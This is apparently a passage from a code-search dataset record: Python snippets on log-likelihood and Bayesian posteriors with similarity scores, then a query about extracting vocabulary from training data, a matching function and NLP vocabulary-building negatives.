sparse_gammaln_ratio(beta, negative_weights, deriv=1)\n res -= dense_gammaln_ratio(alpha + beta, total_weights, deriv=1)\n return res", "def compute_log_likelihood(self,params: ndarray) -> float:\n \n pred_mag = self._pred_mag(params,self.times)\n sigma_2 = self.sd_mags**2 \n ln_likelihood = -0.5*np.sum((pred_mag - self.mags)**2 / sigma_2+ np.log(sigma_2))\n\n return ln_likelihood", "def compute_posterior(prior, likelihood, y):\n\n # -------------------------------------------------------------------------\n # ERROR CHECKS -- DO NOT MODIFY\n #\n\n # check that prior probabilities sum to 1\n if np.abs(1 - np.sum(prior)) > 1e-06:\n exit('In compute_posterior: The prior probabilities need to sum to 1')\n\n # check that likelihood is specified as a 2D array\n if len(likelihood.shape) != 2:\n exit('In compute_posterior: The likelihood needs to be specified as ' +\n 'a 2D array')\n\n K, M = likelihood.shape\n\n # make sure likelihood and prior agree on number of hidden states\n if len(prior) != M:\n exit('In compute_posterior: Mismatch in number of hidden states ' +\n 'according to the prior and the likelihood.')\n\n # make sure the conditional distribution given each hidden state value sums\n # to 1\n for m in range(M):\n if np.abs(1 - np.sum(likelihood[:, m])) > 1e-06:\n exit('In compute_posterior: P(Y | X = %d) does not sum to 1' % m)\n\n #\n # END OF ERROR CHECKS\n # -------------------------------------------------------------------------\n\n # -------------------------------------------------------------------------\n # YOUR CODE GOES HERE FOR PART (b)\n #\n # Place your code to compute the log of the posterior here: store it in a\n # NumPy array called `log_answer`. If you exponentiate really small\n # numbers, the result is likely to underflow (i.e., it will be so small\n # that the computer will just make it 0 rather than storing the right\n # value). You need to go to log-domain. Hint: this next line is a good\n # first step.\n log_prior = np.log(prior)\n# print(log_prior)\n# print(likelihood)\n# print(y)\n unnormal = log_prior + np.log(likelihood[y,:]).sum(axis=0)\n# print(unnormal)\n log_answer = unnormal - scipy.misc.logsumexp(unnormal)\n# print(log_answer)\n\n #\n # END OF YOUR CODE FOR PART (b)\n # -------------------------------------------------------------------------\n\n # do not exponentiate before this step\n posterior = np.exp(log_answer)\n return posterior", "def lnprob(self, theta, x, y, yerr, bat_pars, tmod):\n lp = self.lnprior(theta)\n if not np.isfinite(lp): # if the prior is infinitely small, return -infinity without calculating the model to save computational time.\n return -np.inf, list(0.0 for xx in x)\n\n likelihood, trial_fit = self.lnlike(theta, x, y, yerr, bat_pars, tmod)\n return lp + likelihood, trial_fit # the second argument goes in the blobs variable and saves all trial fits this way.", "def log_likelihood(self, X, Y):\n\t\tr,c = twod(Y).shape\n\t\tif r == 1 and c != 1:\n\t\t\tY = twod(Y).T\n\n\t\tsoft = self.predict_soft(X)\n\t\treturn np.mean(np.sum(np.log(np.power(soft, Y, )), 1), 0)", "def lnlike(theta, dtarray, dmagarray, sigmaarray):\n gamma, A = theta\n\n aux=np.sum(np.log(like_one(theta,dtarray,dmagarray,sigmaarray)))\n\n return aux", "def log_likelihood_function(self, instance) -> float:\n return self.prior.factor(instance[0])", "def test_posterior_logprobs(self):\n x = list(product([True, False], repeat=2))\n xs = list(e for e in product(x, repeat=3))\n all_obs = list(o for o in xs\n if all(any(e) and not all(e) for e in o))\n total = logsumexp(list(posterior_logprobs(np.array(obs), self.S, self.A, self.E)[1]\n for obs in all_obs))\n assert_allclose(total, np.log(1))", "def model_likelihood(\n self, obs: Tensor, actions: Tensor, next_obs: Tensor\n ) -> Tensor:\n return self.model.log_prob(obs, actions, next_obs)", "def bayes_binomial_ratio_err(k1,n1, k2,n2, prior1=[0.5,0.5], prior2=[0.5,0.5],\n a = None, sigma_a = None, b = None, sigma_b = None, ab_prior_type=['Normal', 'Normal'],\n nd=1000, nd_interp=2000, rmax = None, rval = None, CL=[0.025, 0.975],\n nd_y=1500, nd_nuisance=20, int_nncut=5, int_prec=0.1, numerics='numerical', renorm=True,\n gEPS = 0.1):\n\n # --------------------------------------------------------------------\n # Numerical protection\n if a is not None:\n if (sigma_a / a) < gEPS:\n cprint(f'Forcing normal prior(a) pdf for numerical protection','yellow')\n ab_prior_type[0] = 'Normal'\n\n if b is not None:\n if (sigma_b / b) < gEPS:\n cprint(f'Forcing normal prior(b) pdf for numerical protection','yellow')\n ab_prior_type[1] = 'Normal'\n # --------------------------------------------------------------------\n\n if prior1 == 'Flat':\n prior1 = [1, 1]\n if prior1 == 'Jeffrey':\n prior1 = [0.5, 0.5]\n if prior1 == 'Haldane':\n prior1 = [0, 0]\n\n if prior2 == 'Flat':\n prior2 = [1, 1]\n if prior2 == 'Jeffrey':\n prior2 = [0.5, 0.5]\n if prior2 == 'Haldane':\n prior2 = [0, 0]\n\n print(__name__ + f'.bayes_binomial_ratio: prior1 = {prior1}, prior2 = {prior2}')\n\n # Beta prior parameters\n alpha1,beta1 = prior1[0],prior1[1]\n alpha2,beta2 = prior2[0],prior2[1]\n\n # --------------------------------------------------------------------\n # y-integral samples for each pdf(r) point\n def integrand(r, y, k1_new, k2_new):\n return np.abs(y)*binom_post_2D(p1=r*y, p2=y, \\\n k1=k1_new,n1=n1, k2=k2_new,n2=n2, alpha1=alpha1,beta1=beta1, alpha2=alpha2,beta2=beta2)\n\n # --------------------------------------------------------------------\n # Return scale prior pdf values\n def get_ab_prior_pdf(x,mu,sigma, mode):\n\n if mode == 'Gamma':\n gamma_k, gamma_theta = gamma_param_estimate(mu=mu, sigma=sigma)\n print(f'Gamma pdf param k={gamma_k:0.5f}, theta={gamma_theta:0.5f}')\n\n return functions.gamma_pdf(x=x, k=gamma_k, theta=gamma_theta)\n\n elif mode == 'Normal':\n return functions.normpdf(x=x, mu=mu, std=sigma)\n\n else:\n raise Except(f'.bayes_binomial_ratio_err: Unknown scale prior type = {ab_prior_type}')\n\n # --------------------------------------------------------------------\n # Integration range\n def genrange(u, sigma_u, k, n):\n\n MIN = u - int_nncut*sigma_u\n MAX = u + int_nncut*sigma_u\n \n # Boundary control\n if MIN*k < 1: MIN = 1/k \n if MAX*k > n: MAX = n/k\n\n return np.linspace(MIN, MAX, nd_nuisance)\n\n # --------------------------------------------------------------------\n\n # Set maximum ratio to the upper tail\n if rmax is None:\n rmax = 6 * (k1/n1) / (k2/n2)\n\n # Random variable p discretized on a reasonably large interval (loop checks the discretization)\n trials = 1\n while True:\n if rval is None or trials > 1:\n rval = np.linspace(0, rmax, trials * nd)\n pdf = np.zeros(len(rval))\n\n # Via arbitrary precision library (can be very slow for large numbers)\n if numerics == 'mpmath':\n \n pdf = [bayes_posterior_ratio(rval[i], k1,n1, k2,n2, alpha1,beta1, alpha2,beta2) for i in tqdm(range(len(rval)))]\n\n # Via numerical integration\n elif numerics == 'numerical':\n\n pdf = np.zeros(len(rval))\n yval = np.linspace(0,1, nd_y)\n\n # ============================================================\n # Nuisance scale parameters\n\n k1_new = None\n k2_new = None\n\n if a is not None:\n aval = genrange(u=a, sigma_u=sigma_a, k=k1, n=n1)\n a_prior = get_ab_prior_pdf(x=aval, mu=a, sigma=sigma_a, mode=ab_prior_type[0])\n k1_new = aval*k1\n\n # Compute re-normalization (can be crucial near zero, when the left tail is truncated)\n Z = simps(x=aval, y=a_prior); print(f'Prior scale param [a] {ab_prior_type[0]} pdf norm. integral: {Z}')\n a_prior /= Z\n\n if b is not None:\n bval = genrange(u=b, sigma_u=sigma_b, k=k2, n=n2)\n b_prior = get_ab_prior_pdf(x=bval, mu=b, sigma=sigma_b, mode=ab_prior_type[1])\n k2_new = bval*k2\n\n # Compute re-normalization (can be crucial near zero, when the left tail is truncated)\n Z = simps(x=bval, y=b_prior); print(f'Prior scale param [b] {ab_prior_type[1]} pdf norm. integral: {Z}')\n b_prior /= Z\n\n # ============================================================\n # Construct PDF(r) numerically. Bayes denominator (normalization) already handled.\n\n # Apply prior scales a (b) to k1 (k2) and the binomial boundary condition.\n # [Note: cannot apply to p1 (p2) => would result formally\n # in an unidentifiable model (singular Fisher information), at least if a (b)\n # would be floating parameters.\n\n # Only a\n if a is not None and b is None:\n print(__name__ + f'.bayes_binomial_ratio_err: Numerator prior scale param a = ({a}, {sigma_a})')\n \n for i in tqdm(range(len(rval))):\n Ia = np.zeros(len(aval))\n\n for j in range(len(aval)):\n I = integrand(r=rval[i], y=yval, k1_new=k1_new[j], k2_new=k2)\n Ia[j] = simps(x=yval, y=I)\n\n # ***\n pdf[i] = simps(x=aval, y=Ia*a_prior)\n\n # Only b\n elif a is None and b is not None:\n print(__name__ + f'.bayes_binomial_ratio_err: Denominator prior scale param b = ({b}, {sigma_b})')\n \n for i in tqdm(range(len(rval))):\n Ib = np.zeros(len(bval))\n\n for j in range(len(bval)):\n I = integrand(r=rval[i], y=yval, k1_new=k1, k2_new=k2_new[j])\n Ib[j] = simps(x=yval, y=I)\n\n # ***\n pdf[i] = simps(x=bval, y=Ib*b_prior)\n\n # Both a and b\n elif a is not None and b is not None:\n print(__name__ + f'.bayes_binomial_ratio_err: Num. and denom. prior scale param a = ({a}, {sigma_a}) and b = ({b}, {sigma_b})')\n\n for i in tqdm(range(len(rval))):\n\n Ia = np.zeros(len(aval))\n for j in range(len(aval)):\n\n Ib = np.zeros(len(bval))\n for k in range(len(bval)):\n I = integrand(r=rval[i], y=yval, k1_new=k1_new[j], k2_new=k2_new[k])\n Ib[k] = simps(x=yval, y=I)\n\n Ia[j] = simps(x=bval, y=Ib*b_prior)\n\n # ***\n pdf[i] = simps(x=aval, y=Ia*a_prior)\n\n # The no nuisance parameters case\n else:\n print(__name__ + f'.bayes_binomial_ratio_err: No prior (scale) parameters.')\n\n for i in tqdm(range(len(rval))):\n I = np.abs(yval)*binom_post_2D(p1=rval[i]*yval, \\\n p2=yval, k1=k1,n1=n1, k2=k2,n2=n2, alpha1=alpha1,beta1=beta1, alpha2=alpha2,beta2=beta2)\n pdf[i] = simps(x=yval, y=I)\n else:\n raise Exception(__name__ + f'.bayes_binomial_ratio_err: Unknown numerics method {numerics}')\n\n # Interpolate\n f2 = interp1d(rval, pdf, kind='quadratic', fill_value='extrapolate')\n r_dense = np.linspace(0, rmax, nd_interp)\n pdf_dense = f2(r_dense)\n \n # Check normalization\n I = simps(y=pdf_dense, x=r_dense)\n if np.abs(I-1) > int_prec:\n trials += 1\n if numerics == 'numerical':\n nd_y *= 2\n nd_nuisance *= 2\n print(__name__ + f'.bayes_binomial_ratio_err: Posterior integral {I:.6f} => increasing discretization')\n if trials > 10:\n raise Exception(__name__ + f'bayes_binomial_ratio_err: PDF(r) normalization I={I} error (set tech-parameters manually)') \n else:\n break\n \n # Normalization of the posterior PDF to unit integral\n if renorm:\n pdf_dense /= simps(x=r_dense, y=pdf_dense)\n\n print(__name__ + f' >> Posterior integral before: {I:.6f} | after: {simps(x=r_dense, y=pdf_dense)}')\n\n discrete_pdf = pdf_dense / np.sum(pdf_dense) # Normalize to discrete PDF\n discrete_cdf = np.cumsum(discrete_pdf) # Discrete CDF\n CR_val,CR_ind = tools.cdf_percentile(discrete_cdf, r_dense, CL)\n \n output = {\n 'val' : r_dense,\n 'pdf' : pdf_dense,\n 'discrete_pdf': discrete_pdf,\n 'discrete_cdf': discrete_cdf,\n 'CR_value' : CR_val,\n 'CR_index' : CR_ind\n }\n return output", "def plot_likelihood(expected_posts_per_month, probability):\n bar_amount = max(10, int(5 * expected_posts_per_month * probability)) # at least 10 bars, not too long of a tail\n print(\"Generating likelihood plot\")\n distribution = [binom.pmf(option, expected_posts_per_month, probability) for option in range(bar_amount)]\n plt.bar(range(bar_amount), distribution)\n plt.xlabel(\"occurrences\")\n plt.ylabel(\"likelihood\")\n plt.title(\"Likelihood of word occurences next month\")\n plt.show()", "def nloglikeobs(self, params):\n #print len(params),\n beta = params[:-2]\n df = params[-2]\n scale = params[-1]\n loc = np.dot(self.exog, beta)\n endog = self.endog\n x = (endog - loc)/scale\n #next part is stats.t._logpdf\n lPx = sps_gamln((df+1)/2) - sps_gamln(df/2.)\n lPx -= 0.5*np_log(df*np_pi) + (df+1)/2.*np_log(1+(x**2)/df)\n lPx -= np_log(scale) # correction for scale\n return -lPx", "def poisson_log_likelihood(x, log_rate):\n return x * log_rate - np.exp(log_rate) - lax.lgamma(x + 1.0)", "def calc_likelihood(par_num, par_rng):\n\n likelihoods = np.zeros(np.size(par_rng))\n\n trivial_prior = trivial_prior_class()\n\n pipe = pipeline(observables_generator=hammu12,\n likelihood=likelihood,\n prior=trivial_prior,\n optimizer_class=Hamiltonian_Monte_Carlo)\n\n parameters = [0]*hammu12.get_parameter_dimension()\n for par_val in par_rng:\n parameters[par_num] = par_val\n likelihoods[par_val-par_rng[0]] = pipe._calc_posterior(parameters)\n\n np.save('data%s_RM' % (par_num), likelihoods)", "def _build_likelihood(self):\n\n # Get prior KL.\n KL = self.build_prior_KL()\n\n # Get conditionals\n fmean, fvar = self._build_predict(self.X, full_cov=False)\n\n # Get variational expectations.\n var_exp = self.likelihood.variational_expectations(fmean, fvar, self.Y) * self.obs_weight\n\n # re-scale for minibatch size\n scale = tf.cast(self.num_data, gp.settings.float_type) / tf.cast(tf.shape(self.X)[0], gp.settings.float_type)\n scale = scale / tf.reduce_mean(self.obs_weight)\n return tf.reduce_sum(var_exp) * scale - KL", "def log_likelihood_exp(self, x):\n predictions = self.get_predictions(x)\n ll = 0.\n for measurement in self.get_measurements:\n m_obj = flavio.Measurement[measurement]\n m_obs = m_obj.all_parameters\n exclude_observables = set(m_obs) - set(self.observables)\n prob_dict = m_obj.get_logprobability_all(predictions, exclude_parameters=exclude_observables)\n ll += sum(prob_dict.values())\n return ll", "def brownian_motion_log_returns(param):\n sqrt_delta_sigma = math.sqrt(param.time_rate) * param.vol\n return nrand.normal(loc=0, scale=sqrt_delta_sigma, size=param.time)", "def binary_log_likelihood(y, log_y_hat):\n return tf.reduce_sum(y*(-softplus(-log_y_hat)) +\n (1 - y)*(-log_y_hat-softplus(-log_y_hat)),\n 1)" ]
[ "0.6838529", "0.6828888", "0.68097115", "0.674418", "0.67185456", "0.66190183", "0.66117036", "0.6602112", "0.65802485", "0.657394", "0.6549069", "0.65399593", "0.6539858", "0.65330833", "0.65202075", "0.64768666", "0.647659", "0.6444814", "0.6444441", "0.638896", "0.6378039", "0.63620603", "0.6357647", "0.63511467", "0.63455725", "0.6332465", "0.6308469", "0.63079995", "0.63072234", "0.6298493", "0.62830865", "0.6270564", "0.62594086", "0.624422", "0.6237342", "0.6235021", "0.62301815", "0.6212115", "0.6211884", "0.6211629", "0.6178929", "0.61781543", "0.616288", "0.6158828", "0.61434627", "0.61273885", "0.6117766", "0.6111547", "0.6106596", "0.6102621", "0.6092983", "0.60929227", "0.6080551", "0.60779303", "0.60653436", "0.60630405", "0.60606104", "0.6054574", "0.60514486", "0.60417217", "0.60354596", "0.60346276", "0.6028603", "0.6026584", "0.6022251", "0.6018485", "0.6016998", "0.5999549", "0.5998937", "0.5998304", "0.5997439", "0.5991243", "0.5989531", "0.59815544", "0.5972668", "0.5971176", "0.59653527", "0.5956561", "0.5941796", "0.5940286", "0.5940241", "0.59352314", "0.5929154", "0.59260905", "0.59189546", "0.591816", "0.59159553", "0.59145415", "0.5911106", "0.59101856", "0.59078467", "0.58981663", "0.58973956", "0.58954453", "0.5893891", "0.58936", "0.58920485", "0.5887853", "0.5883396", "0.58781683" ]
0.66105807
7
Extract the known vocabulary from our training data
def get_vocab(trainingData): return set(reduce(lambda x,y: x+y, map(lambda x: map(lambda y: y[0], x), trainingData), []))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_vocab(self):\n\n\t\tself.parse_transcript() \n\t\tself.purge_words()\n\t\tself.analyze_words()\n\t\tself.sort_word_analysis()", "def get_vocabulary(documents):\n cv_model = CountVectorizer(binary=True)\n cv_model.fit(documents)\n\n vocabulary = cv_model.get_feature_names()\n vocabulary = list(map(str, vocabulary))\n\n return vocabulary", "def vocabulary(self) -> np.ndarray:\n return np.array(\n list(set(word for text in self.preprocess_corpus for word in text))\n )", "def create_vocab():\n \n cutoff = CUTOFF\n \n lines = open(INFNAME_FORMAT.format(\"train\")).readlines() \\\n + open(INFNAME_FORMAT.format(\"test\")).readlines()\n raw = [process_line(l) for l in lines]\n cntx = Counter( [ w for e in raw for w in e ] )\n vocab = { x for x, y in cntx.items() if y > cutoff }\n \n return vocab", "def known(words):\n return [w for w in words if w in tokenizer.vocab] #change vocab file?", "def get_vocab(train_data, valid_data, test_data):\n \n print(\"-----------------------------------------------\")\n print(\"Constructing Vocabulary of Words and Characters\")\n print(\"-----------------------------------------------\")\n\n with open(train_data,'r') as f:\n train_corpus = f.readlines()\n f.close()\n\n with open(valid_data,'r') as f:\n valid_corpus = f.readlines()\n f.close()\n\n with open(test_data,'r') as f:\n test_corpus = f.readlines()\n f.close()\n\n word_vocab = {}\n char_vocab = {}\n max_len = 0\n\n word_vocab, char_vocab, max_len = make_vocab(train_corpus, word_vocab, char_vocab, max_len)\n word_vocab, char_vocab, max_len = make_vocab(valid_corpus, word_vocab, char_vocab, max_len)\n word_vocab, char_vocab, max_len = make_vocab(test_corpus, word_vocab, char_vocab, max_len)\n\n char_vocab['<SOT>'] = len(char_vocab)+1 \n char_vocab['<EOT>'] = len(char_vocab)+1\n\n print(\"Word Vocabulary Size : %d\"%len(word_vocab))\n print(\"Character Vocabulary Size : %d\"%len(char_vocab))\n print(\"Max Length of Word - 2 : %d\"%max_len)\n\n return word_vocab, char_vocab, max_len", "def vocabulary(self):\n return self._vocabulary", "def vocabulary(corpus_tokenized):\n vocab = list()\n for element in corpus_tokenized:\n document = element['document']\n for word in document:\n if word not in vocab:\n vocab.append(word)\n return vocab", "def vocabulary(self):\n return [recid for recid in self._model.vocab]", "def load_target_vocab(self):\n vocab = [line.split()[0] for line in open(os.path.join('preprocessed', 'all_vocab.txt'), 'r').read().splitlines()]\n self.word2idx = {word: idx for idx, word in enumerate(vocab)}\n self.idx2word = {idx: word for idx, word in enumerate(vocab)}\n self.vocab_size = len(self.word2idx)", "def vocabulary(self):\n lst = []\n for key in self.frequencies().keys():\n lst.append(key)\n return sorted(lst)\n #for lines in self.lines:\n # line = lines.strip(os.linesep)\n # wordslst = line.split()\n # for word in wordslst:\n # if word not in lst:\n # lst.append(word.lower())\n #return sorted(lst)", "def load_vocabulary(self):\n vocab_file = open(vocabulary_path, \"r\")\n self.vocab_list = vocab_file.read().split(\"\\n\")\n vocab_file.close()\n print(\"[INFO] Reading vocabulary...\")\n print(self.vocab_list[0:15])", "def get_vocabulary(corpus,\n initial_vocab={\n '<unk>': 0,\n '<sssss>': 1\n },\n vocabsize=0):\n vocab = copy.copy(initial_vocab)\n word_count = Counter()\n for text in corpus:\n for w in text.split(' '):\n word_count[w] += 1\n\n # if vocabulary size is specified, most common words are selected\n if vocabsize > 0:\n for w in word_count.most_common(vocabsize):\n if w[0] not in vocab:\n vocab[w[0]] = len(vocab)\n if len(vocab) >= vocabsize:\n break\n else: # all observed words are stored\n for w in word_count:\n if w not in vocab:\n vocab[w] = len(vocab)\n return vocab", "def build_vocab(self):\n if self.test_file is None:\n print('test_file is None')\n file_list = [self.train_file, self.dev_file]\n else:\n file_list = [self.train_file, self.dev_file, self.test_file]\n\n examples = []\n for file_name in file_list:\n examples += ParseExample.load_data(file_name)\n\n sents = []\n for example in examples:\n warrant0, warrant1, reason, claim, debate_meta_data, negclaim = example.get_six(type=WORD_TYPE)\n sents.append(warrant0)\n sents.append(warrant1)\n sents.append(reason)\n sents.append(claim)\n sents.append(debate_meta_data)\n\n vocab = data_utils.build_word_vocab(sents)\n\n return vocab", "def build_vocab(sentences):\n # Build vocabulary\n word_counts = Counter(itertools.chain(*sentences)) # 实际没用到\n # Mapping from index to word\n vocabulary_inv = [x[0] for x in word_counts.most_common()]\n vocabulary_inv = list(sorted(vocabulary_inv))\n # 加入 <UNK>\n vocabulary_inv.insert(0, '</s>')\n # Mapping from word to index\n vocabulary = {x: i for i, x in enumerate(vocabulary_inv)}\n return [vocabulary, vocabulary_inv]", "def load_vocab(self):\n\n if self.vocabulary_path: \n # For now, the file format is derived from the file extension.\n if self.vocabulary_path.endswith('csv'):\n self.logger.info(\"Filter spymaster vocabulary by csv-file: {}\".format(self.vocabulary_path))\n with open(self.vocabulary_path, 'r') as fin:\n reader = csv.reader(fin)\n header = next(reader)\n for row in reader:\n word = row[1].lower()\n self.update_vocab(word) \n elif self.vocabulary_path.endswith('txt'):\n self.logger.info(\"Filter spymaster vocabulary by txt-file: {}\".format(self.vocabulary_path))\n with open(self.vocabulary_path, 'r') as fin:\n for line in fin:\n word = line.strip()\n self.update_vocab(word)\n else:\n raise ValueError(\"Unknown file format for filter spymaster vocabulary.\") \n else:\n self.logger.info(\"Load spymaster vocabulary from gensim.models.KeyedVectors.\")\n self.vocab = self.model.vocab\n self.vocab_size = len(self.vocab)\n\n self.logger.info(\"Spymaster vocabulary size is {}\".format(self.vocab_size))", "def load_vocab():\n # vocab loaded internally at google\n unused = r.sp_model\n del unused\n return r", "def trainingsVocabulary(context):\n ct = getToolByName(context,'portal_catalog')\n dictSearch = {'portal_type':'apyb.papers.training',\n 'sort_on':'sortable_title',\n 'review_state':'confirmed'}\n trainings = ct.searchResults(**dictSearch)\n trainings = [SimpleTerm(b.UID,b.UID,b.Title) for b in trainings]\n return SimpleVocabulary(trainings)", "def get_input_vocab():\n vocab = set()\n vocab.update(list(string.ascii_letters))\n vocab.update(list(string.digits))\n vocab.update(list(string.punctuation))\n vocab.update(list(string.whitespace))\n vocab.update(['<unk>', '<pad>'])\n return dict(zip(sorted(vocab), list(range(len(vocab)))))", "def preproc_user_input(txt, model):\r\n txt = pre_process(txt)\r\n txt_tokenized = [word for word in txt.split(\" \") if word in model.wv.vocab]\r\n return \" \".join(txt_tokenized)", "def vocab(self):\n num_words = -1\n if not self._vocab:\n c = self._conn.cursor()\n c.execute('select feature, censored, word_id from vocab')\n\n d = {}\n for ww, cc, ii in c:\n d[ii] = ww\n d[ww] = ii\n if cc == 1:\n self._censored.add(ww)\n num_words = max(ii, num_words)\n\n logger.info(\"Loaded vocab with %i words; %i censored\" % \\\n (len(d) / 2, len(self._censored)))\n\n # Add the start symbol\n if not START_SYMBOL in d:\n d[START_SYMBOL] = num_words + 1\n d[num_words + 1] = START_SYMBOL\n\n logger.info(\"Retrieved %i words\" % num_words)\n self._vocab = d\n\n return self._vocab", "def getVocabularyDict(vocabulary: dict, training_feature: TrainingFeature):\n vocab = {}\n index = 0\n if training_feature.FEATURE_DROP_FREQUENT_WORDS:\n print(\"Select vocabdict with drop_frequent\")\n array = sorted([(k, v) for (k, v) in vocabulary.items()], key= lambda x: x[1])\n print(\"Total length: \", len(array))\n length = len(array)\n array = array[int(length * 0.75): int(length * 1.0)][0:training_feature.VOCAB_SIZE]\n for (k , _) in array:\n vocab.setdefault(k, index)\n index += 1\n else:\n print(\"Select vocabdict with non_drop_frequent\")\n array = sorted([(k, v) for (k, v) in vocabulary.items()], key=lambda x: x[1])\n length = len(array)\n print(\"Total length: \", length)\n array = array[-training_feature.VOCAB_SIZE:]\n for (k, _) in array:\n vocab.setdefault(k, index)\n index += 1\n # for (k, v) in vocabulary.items():\n # if v > 50:\n # vocab.setdefault(k, index)\n # index += 1\n print(\"VocabDict length: \", len(vocab))\n # print(vocab)\n return vocab", "def _get_vocabulary(connection):\n print('---Getting vocabulary---')\n vocabulary = {}\n cursor = connection.cursor()\n cursor.execute(\"SELECT * FROM words;\")\n res = cursor.fetchall()\n num_words = 0\n for word in res:\n vocabulary[word[0]] = num_words\n num_words += 1\n return vocabulary", "def initialize_vocabulary(self,vocabulary_path):\n if tf.gfile.Exists(vocabulary_path):\n vocab = corpora.Dictionary.load(vocabulary_path)\n print(\"vocab length: \",len(vocab.token2id))\n\n return vocab.token2id, vocab.token2id.keys()\n else:\n raise ValueError(\"Vocabulary file %s not found.\", vocabulary_path)", "def get_vocab(self):\n if self.dtm is None:\n raise ValueError(\"Preprocessor has not been fit. \\\n Provide series of articles.\")\n return list(self.dtm.columns)", "def build_vocab(self, corpus):\n if self.vocabulary_counts != None:\n logger.debug(\"building vocabulary from provided frequency map\")\n vocab = self.vocabulary_counts\n else:\n logger.debug(\"default vocabulary building\")\n super(Skipgram, self).build_vocab(corpus)\n return\n\n # assign a unique index to each word\n self.vocab, self.index2word = {}, []\n\n for word, count in vocab.iteritems():\n v = Vocab()\n v.count = count\n if v.count >= self.min_count:\n v.index = len(self.vocab)\n self.index2word.append(word)\n self.vocab[word] = v\n\n logger.debug(\"total %i word types after removing those with count<%s\" % (len(self.vocab), self.min_count))\n\n if self.hs:\n # add info about each word's Huffman encoding\n self.create_binary_tree()\n if self.negative:\n # build the table for drawing random words (for negative sampling)\n self.make_table()\n # precalculate downsampling thresholds\n self.precalc_sampling()\n self.reset_weights()", "def vocabulary(self, config=Config()):\n raise NotImplementedError(\"Class %s doesn't implement vocabulary()\" % self.__class__.__name__)", "def getVocabulary(self): # real signature unknown; restored from __doc__\n pass", "def build_vocab(data):\n # data = _read_words(filename)\n counter = collections.Counter(data)\n # print('counter', counter) # dictionary for the occurrence number of each word, e.g. 'banknote': 1, 'photography': 1, 'kia': 1\n count_pairs = sorted(counter.items(), key=lambda x: (-x[1], x[0]))\n # print('count_pairs',count_pairs) # convert dictionary to list of tuple, e.g. ('ssangyong', 1), ('swapo', 1), ('wachter', 1)\n words, _ = list(zip(*count_pairs))\n word_to_id = dict(zip(words, range(len(words))))\n # print(words) # list of words\n # print(word_to_id) # dictionary for word to id, e.g. 'campbell': 2587, 'atlantic': 2247, 'aoun': 6746\n return word_to_id", "def build_doc_sense_vec(self):\n\t\twith codecs.open(self.vocab_file, encoding='utf-8', mode='r') as infile:\n\t\t\tline = infile.readline()\n\t\t\ti = 0\n\t\t\twhile line:\n\t\t\t\tword = line.split()[0]\n\t\t\t\tif not self.word2IdVocabulary.has_key(word):\n\t\t\t\t\t# print i, word\n\t\t\t\t\t# else:\n\t\t\t\t\tself.word2IdVocabulary[word] = i\n\t\t\t\tif not self.id2WordVocabulary.has_key(i):\n\t\t\t\t\tself.id2WordVocabulary[i] = word\n\t\t\t\tline = infile.readline()\n\t\t\t\ti += 1\n\t\t\tself.vocab_num = len(self.word2IdVocabulary)\n\t\t\tprint \"vocabulary number:\" + str(self.vocab_num)\n\n\t\twith codecs.open(self.vec_file, encoding='utf-8', mode='r') as vecfile:\n\t\t\twith codecs.open(self.vec_out_file, encoding='utf-8', mode='a+') as vec_outfile:\n\n\t\t\t\tfor i, line in enumerate(vecfile):\n\t\t\t\t\tif i % 10000 == 0:\n\t\t\t\t\t\tprint i\n\t\t\t\t\t# if i > 72:\n\t\t\t\t\t# \tbreak\n\t\t\t\t\tif i == 0:\n\t\t\t\t\t\ta, b, c = map(int, line.split()[:3])\n\t\t\t\t\t\tprint('Number of sememes: {}\\n'\n\t\t\t\t\t\t\t 'Number of words: {}\\n'\n\t\t\t\t\t\t\t 'Dimension of vectors: {}'.format(a, b, c))\n\t\t\t\t\telif i > 462667:\n\t\t\t\t\t\tsline = line.strip('\\n').split()\n\t\t\t\t\t\tword = sline[0]\n\t\t\t\t\t\tvector_list = []\n\t\t\t\t\t\tvector_list.append(sline[1:])\n\t\t\t\t\t\tvector_array = np.array(vector_list)\n\t\t\t\t\t\tword_id = self.word2IdVocabulary[word]\n\t\t\t\t\t\tif not self.vectors.has_key(word_id):\n\t\t\t\t\t\t\tself.vectors[word_id] = vector_array\n\t\t\t\t\t\t# vector_mean = np.mean(vector_array, axis=0)\n\t\t\t\t\t\tif not self.vector_mean.has_key(word_id):\n\t\t\t\t\t\t\tself.vector_mean[word_id] = vector_array\n\t\t\t\t\t\t# vec_outfile.write(line)\n\t\t\t\t\telif i > 462887:\n\t\t\t\t\t\tbreak\n\t\t\t\t\telse:\n\t\t\t\t\t\tsline = line.strip('\\n').split()\n\t\t\t\t\t\tword = sline[0]\n\t\t\t\t\t\tsense_num = int(sline[1])\n\t\t\t\t\t\tvectors = sline[2:sense_num*c+2] # (sense_num*c+2)\n\t\t\t\t\t\tvector_list = []\n\t\t\t\t\t\tfor start in range(0, len(vectors), c):\n\t\t\t\t\t\t\tvector_list.append(list(map(float, vectors[start: start+c])))\n\t\t\t\t\t\tvector_array = np.array(vector_list)\n\t\t\t\t\t\tword_id = self.word2IdVocabulary[word]\n\t\t\t\t\t\tif not self.vectors.has_key(word_id):\n\t\t\t\t\t\t\tself.vectors[word_id] = vector_array\n\t\t\t\t\t\tvector_mean = np.mean(vector_array, axis=0)\n\t\t\t\t\t\tif not self.vector_mean.has_key(word_id):\n\t\t\t\t\t\t\tself.vector_mean[word_id] = vector_mean\n\t\t\t\t\t\t'''j = 0\n\t\t\t\t\t\tfor each_sense_vec in vector_array:\n\t\t\t\t\t\t\tif len(vector_array) > 1:\n\t\t\t\t\t\t\t\tnew_line = word + '_' + str(j) + ' ' + np.array2string(each_sense_vec, max_line_width=2000,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tformatter={'float_kind': lambda x: '%6f' % x})[1:-1] + '\\n'\n\t\t\t\t\t\t\t\tj += 1\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tnew_line = word + ' ' + np.array2string(each_sense_vec, max_line_width=2000,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t formatter={'float_kind': lambda\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t x: '%6f' % x})[1:-1] + '\\n'\n\n\t\t\t\t\t\t\tvec_outfile.write(new_line)'''\n\n\t\twith codecs.open(self.doc_file, encoding='utf-8', mode='r') as docfile:\n\t\t\twith codecs.open(self.doc_out_file, encoding='utf-8', mode='a+') as doc_outfile:\n\t\t\t\twith codecs.open(self.vec_out_file_bydoc, encoding='utf-8', mode='a+') as 